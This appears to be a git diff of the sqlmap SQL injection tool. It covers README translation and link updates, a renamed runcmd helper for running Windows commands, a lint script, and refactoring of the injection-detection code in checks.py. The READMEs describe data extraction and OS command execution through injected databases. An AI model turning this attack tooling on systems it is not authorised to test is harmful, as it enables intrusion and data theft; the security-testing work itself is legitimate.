relicense code has caused devastating problems for other Free Software
projects (such as KDE and NASM). If you wish to specify special license
conditions of your contributions, just say so when you send them.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of

4
doc/THANKS.md
View File

@@ -139,7 +139,7 @@ Jim Forster, <jimforster(at)goldenwest.com>
* for reporting a bug
Rong-En Fan, <rafan(at)freebsd.org>
* for commiting the sqlmap 0.5 port to the official FreeBSD project repository
* for committing the sqlmap 0.5 port to the official FreeBSD project repository
Giorgio Fedon, <giorgio.fedon(at)gmail.com>
* for suggesting a speed improvement for bisection algorithm
@@ -562,7 +562,7 @@ Kazim Bugra Tombul, <mhackmail(at)gmail.com>
* for reporting a minor bug
Efrain Torres, <et(at)metasploit.com>
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository
* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository
* for his great Metasploit WMAP Framework
Sandro Tosi, <matrixhasu(at)gmail.com>

50
doc/translations/README-bg-BG.md Normal file
View File

@@ -0,0 +1,50 @@
# sqlmap
[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![Лиценз](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
Демо снимки
----
![Снимка на екрана](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
Можете да посетите [колекцията от снимки на екрана](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots), показващи някои функции, качени на wiki.
Инсталиране
----
Може да изтеглине най-новите tar архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/tarball/master) или най-новите zip архиви като кликнете [тук](https://github.com/sqlmapproject/sqlmap/zipball/master).
За предпочитане е да изтеглите sqlmap като клонирате [Git](https://github.com/sqlmapproject/sqlmap) хранилището:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap работи самостоятелно с [Python](http://www.python.org/download/) версия **2.6.x** и **2.7.x** на всички платформи.
Използване
----
За да получите списък с основните опции използвайте:
python sqlmap.py -h
За да получите списък с всички опции използвайте:
python sqlmap.py -hh
Може да намерите пример за използване на sqlmap [тук](https://asciinema.org/a/46601).
За да разберете възможностите на sqlmap, списък на поддържаните функции и описание на всички опции, заедно с примери, се препоръчва да се разгледа [упътването](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Връзки
----
* Начална страница: http://sqlmap.org
* Изтегляне: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* RSS емисия: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Проследяване на проблеми и въпроси: https://github.com/sqlmapproject/sqlmap/issues
* Упътване: https://github.com/sqlmapproject/sqlmap/wiki
* Често задавани въпроси (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Демо: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Снимки на екрана: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-es-MX.md
View File

@@ -33,7 +33,7 @@ Para obtener una lista de todas las opciones:
python sqlmap.py -hh
Se puede encontrar una muestra de su funcionamiento [aquí](https://asciinema.org/a/46601).
Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki).
Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Enlaces
---
@@ -44,9 +44,6 @@ Enlaces
* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues
* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki
* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-fr-FR.md
View File

@@ -33,7 +33,7 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
python sqlmap.py -hh
Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki).
Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Liens
----
@@ -44,9 +44,6 @@ Liens
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
* Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Démonstrations: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Les captures d'écran: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-gr-GR.md
View File

@@ -34,7 +34,7 @@
python sqlmap.py -hh
Μπορείτε να δείτε ένα δείγμα λειτουργίας του προγράμματος [εδώ](https://asciinema.org/a/46601).
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki).
Για μια γενικότερη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηριζόμενων χαρακτηριστικών και περιγραφή για όλες τις επιλογές, μαζί με παραδείγματα, καλείστε να συμβουλευτείτε το [εγχειρίδιο χρήστη](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Σύνδεσμοι
----
@@ -45,9 +45,6 @@
* Προβλήματα: https://github.com/sqlmapproject/sqlmap/issues
* Εγχειρίδιο Χρήστη: https://github.com/sqlmapproject/sqlmap/wiki
* Συχνές Ερωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Εγγραφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list αρχείο: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-hr-HR.md
View File

@@ -34,7 +34,7 @@ Kako biste dobili listu svih opcija i prekidača koristite:
python sqlmap.py -hh
Možete pronaći primjer izvršavanja [ovdje](https://asciinema.org/a/46601).
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki).
Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih značajki te opis svih opcija i prekidača, zajedno s primjerima, preporučen je uvid u [korisnički priručnik](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Poveznice
----
@@ -45,9 +45,6 @@ Poveznice
* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues
* Korisnički priručnik: https://github.com/sqlmapproject/sqlmap/wiki
* Najčešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-id-ID.md
View File

@@ -35,7 +35,7 @@ Untuk mendapatkan daftar opsi lanjut gunakan:
python sqlmap.py -hh
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Tautan
----
@@ -46,9 +46,6 @@ Tautan
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-it-IT.md
View File

@@ -34,7 +34,7 @@ Per una lista di tutte le opzioni e di tutti i controlli:
python sqlmap.py -hh
Puoi trovare un esempio di esecuzione [qui](https://asciinema.org/a/46601).
Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) (disponibile solo in inglese).
Per una panoramica delle capacità di sqlmap, una lista delle sue funzionalità e la descrizione di tutte le sue opzioni e controlli, insieme ad un gran numero di esempi, siete pregati di visitare lo [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage) (disponibile solo in inglese).
Link
----
@@ -45,9 +45,6 @@ Link
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manuale dell'utente: https://github.com/sqlmapproject/sqlmap/wiki
* Domande più frequenti (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Iscrizione alla Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Archivio della Mailing list: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Dimostrazioni: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-ja-JP.md
View File

@@ -35,7 +35,7 @@ sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x**
python sqlmap.py -hh
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki) で確認することができます。
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki/Usage) で確認することができます。
リンク
----
@@ -46,9 +46,6 @@ sqlmapの概要、機能の一覧、全てのオプションやスイッチの
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* メーリングリストへの参加: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* メーリングリストのRSSフィード: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* メーリングリストのアーカイブ: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

3
doc/translations/README-pt-BR.md
View File

@@ -46,9 +46,6 @@ Links
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-tr-TR.md
View File

@@ -37,7 +37,7 @@ Bütün seçenekleri gösterir
python sqlmap.py -hh
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki/Usage) bakmanızı tavsiye ediyoruz
Links
----
@@ -48,9 +48,6 @@ Links
* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mail listesi arşivi: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

5
doc/translations/README-zh-CN.md
View File

@@ -33,7 +33,7 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和
python sqlmap.py -hh
你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki/Usage)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
链接
----
@@ -44,9 +44,6 @@ sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

4
extra/mssqlsig/update.py
View File

@@ -43,7 +43,7 @@ def updateMSSQLXML():
return
releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M)
releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
releasesCount = len(releases)
# Create the minidom document
@@ -74,7 +74,7 @@ def updateMSSQLXML():
stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
servicepackVersion = re.findall("</td><td>[7\.0|2000|2005|2008|2008 R2]*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I | re.M)
servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
for servicePack, version in servicepackVersion:
if servicePack.startswith(" "):

6
extra/runcmd/README.txt
View File

@@ -1,3 +1,3 @@
Files in this folder can be used to compile auxiliary program that can
be used for running command prompt commands skipping standard "cmd /c" way.
They are licensed under the terms of the GNU Lesser General Public License.
runcmd.exe is an auxiliary program that can be used for running command prompt
commands skipping standard "cmd /c" way. It is licensed under the terms of the
GNU Lesser General Public License.

0
shell/runcmd.exe_ → extra/runcmd/runcmd.exe_
View File

0
extra/runcmd/windows/README.txt → extra/runcmd/src/README.txt
View File

0
extra/runcmd/windows/runcmd.sln → extra/runcmd/src/runcmd.sln
View File

0
extra/runcmd/windows/runcmd/runcmd.cpp → extra/runcmd/src/runcmd/runcmd.cpp
View File

0
extra/runcmd/windows/runcmd/runcmd.vcproj → extra/runcmd/src/runcmd/runcmd.vcproj
View File

0
extra/runcmd/windows/runcmd/stdafx.cpp → extra/runcmd/src/runcmd/stdafx.cpp
View File

0
extra/runcmd/windows/runcmd/stdafx.h → extra/runcmd/src/runcmd/stdafx.h
View File

7
extra/shutils/pydiatra.sh Normal file
View File

@@ -0,0 +1,7 @@
#!/bin/bash
# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
# See the file 'doc/COPYING' for copying permission
# Runs py2diatra on all python files (prerequisite: pip install pydiatra)
find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except

8
extra/shutils/pypi.sh
View File

@@ -132,7 +132,7 @@ You can find a sample run `here <https://asciinema.org/a/46601>`__. To
get an overview of sqlmap capabilities, list of supported features and
description of all options and switches, along with examples, you are
advised to consult the `user's
manual <https://github.com/sqlmapproject/sqlmap/wiki>`__.
manual <https://github.com/sqlmapproject/sqlmap/wiki/Usage>`__.
Links
-----
@@ -147,12 +147,6 @@ Links
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
- Frequently Asked Questions (FAQ):
https://github.com/sqlmapproject/sqlmap/wiki/FAQ
- Mailing list subscription:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- Mailing list RSS feed:
http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
- Mailing list archive:
http://news.gmane.org/gmane.comp.security.sqlmap
- Twitter: [@sqlmap](https://twitter.com/sqlmap)
- Demos: http://www.youtube.com/user/inquisb/videos
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

4
extra/shutils/regressiontest.py
View File

@@ -40,7 +40,7 @@ def prepare_email(content):
msg = MIMEMultipart()
msg["Subject"] = SUBJECT
msg["From"] = FROM
msg["To"] = TO if isinstance(TO, basestring) else ",".join(TO)
msg["To"] = TO if isinstance(TO, basestring) else ','.join(TO)
msg.attach(MIMEText(content))
@@ -83,7 +83,7 @@ def main():
if stderr:
failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout, re.M)
failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
for failed_test in failed_tests:
title = failed_test[0]

4
lib/controller/action.py
View File

@@ -16,8 +16,8 @@ from lib.core.enums import CONTENT_TYPE
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
from lib.utils.brute import columnExists
from lib.utils.brute import tableExists
def action():
"""

125
lib/controller/checks.py
View File

@@ -7,10 +7,12 @@ See the file 'doc/COPYING' for copying permission
import copy
import httplib
import os
import random
import re
import socket
import subprocess
import tempfile
import time
from extra.beep.beep import beep
@@ -30,6 +32,7 @@ from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import intersect
from lib.core.common import listToStrValue
from lib.core.common import openFile
from lib.core.common import parseFilePaths
from lib.core.common import popValue
from lib.core.common import pushValue
@@ -55,6 +58,7 @@ from lib.core.enums import HASHDB_KEYS
from lib.core.enums import HEURISTIC_TEST
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MKSTEMP_PREFIX
from lib.core.enums import NOTE
from lib.core.enums import NULLCONNECTION
from lib.core.enums import PAYLOAD
@@ -63,8 +67,11 @@ from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSkipTargetException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
from lib.core.settings import CHECK_INTERNET_ADDRESS
from lib.core.settings import CHECK_INTERNET_VALUE
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FI_ERROR_REGEX
@@ -126,7 +133,7 @@ def checkSqlInjection(place, parameter, value):
# then attempt to identify with a simple DBMS specific boolean-based
# test what the DBMS may be
if not injection.dbms and PAYLOAD.TECHNIQUE.BOOLEAN in injection.data:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None:
if not Backend.getIdentifiedDbms() and kb.heuristicDbms is None and not kb.droppingRequests:
kb.heuristicDbms = heuristicCheckDbms(injection)
# If the DBMS has already been fingerprinted (via DBMS-specific
@@ -137,7 +144,7 @@ def checkSqlInjection(place, parameter, value):
SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
# If the DBMS has been fingerprinted (via DBMS-specific error
# message, via simple heuristic check or via DBMS-specific
@@ -152,7 +159,7 @@ def checkSqlInjection(place, parameter, value):
msg += " and " if conf.level < 5 and conf.risk < 3 else ""
msg += "risk (%d)" % conf.risk if conf.risk < 3 else ""
msg += " values? [Y/n]" if conf.level < 5 and conf.risk < 3 else " value? [Y/n]"
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y').upper() == 'Y' else []
kb.extendTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
title = test.title
kb.testType = stype = test.stype
@@ -160,6 +167,13 @@ def checkSqlInjection(place, parameter, value):
unionExtended = False
trueCode, falseCode = None, None
if conf.httpCollector is not None:
conf.httpCollector.setExtendedArguments({
"_title": title,
"_place": place,
"_parameter": parameter,
})
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
@@ -491,7 +505,7 @@ def checkSqlInjection(place, parameter, value):
if candidates:
candidates = sorted(candidates, key=lambda _: len(_))
for candidate in candidates:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
if re.match(r"\A[\w.,! ]+\Z", candidate) and ' ' in candidate and candidate.strip() and len(candidate) > CANDIDATE_SENTENCE_MIN_LENGTH:
conf.string = candidate
injectable = True
@@ -550,14 +564,11 @@ def checkSqlInjection(place, parameter, value):
# Perform the test's request and grep the response
# body for the test's <grep> regular expression
try:
page, headers = Request.queryPage(reqPayload, place, content=True, raise404=False)
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue( \
[headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] \
if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] \
if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == \
threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
if output:
result = output == "1"
@@ -631,7 +642,8 @@ def checkSqlInjection(place, parameter, value):
msg += "extended UNION tests if there is not "
msg += "at least one other (potential) "
msg += "technique found. Do you want to skip? [Y/n] "
kb.futileUnion = readInput(msg, default="Y").strip().upper() == 'N'
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
if kb.futileUnion is False:
continue
@@ -737,26 +749,31 @@ def checkSqlInjection(place, parameter, value):
warnMsg = "user aborted during detection phase"
logger.warn(warnMsg)
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default="S", checkBatch=False)
if conf.multipleTargets:
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default='T', checkBatch=False).upper()
else:
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
choice = readInput(msg, default='S', checkBatch=False).upper()
if choice[0] in ("s", "S"):
pass
elif choice[0] in ("c", "C"):
if choice == 'X':
if conf.multipleTargets:
raise SqlmapSkipTargetException
elif choice == 'C':
choice = None
while not ((choice or "").isdigit() and 0 <= int(choice) <= 6):
if choice:
logger.warn("invalid value")
msg = "enter new verbosity level: [0-6] "
choice = readInput(msg, default=str(conf.verbose), checkBatch=False).strip()
choice = readInput(msg, default=str(conf.verbose), checkBatch=False)
conf.verbose = int(choice)
setVerbosity()
tests.insert(0, test)
elif choice[0] in ("n", "N"):
elif choice == 'N':
return None
elif choice[0] in ("e", "E"):
elif choice == 'E':
kb.endDetection = True
elif choice[0] in ("q", "Q"):
elif choice == 'Q':
raise SqlmapUserQuitException
finally:
@@ -819,6 +836,8 @@ def heuristicCheckDbms(injection):
infoMsg += "could be '%s' " % retVal
logger.info(infoMsg)
kb.heuristicExtendedDbms = retVal
return retVal
def checkFalsePositives(injection):
@@ -961,7 +980,7 @@ def heuristicCheckSqlInjection(place, parameter):
payload = "%s%s%s" % (prefix, randStr, suffix)
payload = agent.payload(place, parameter, newValue=payload)
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
kb.heuristicPage = page
kb.heuristicMode = False
@@ -999,7 +1018,7 @@ def heuristicCheckSqlInjection(place, parameter):
if kb.ignoreCasted is None:
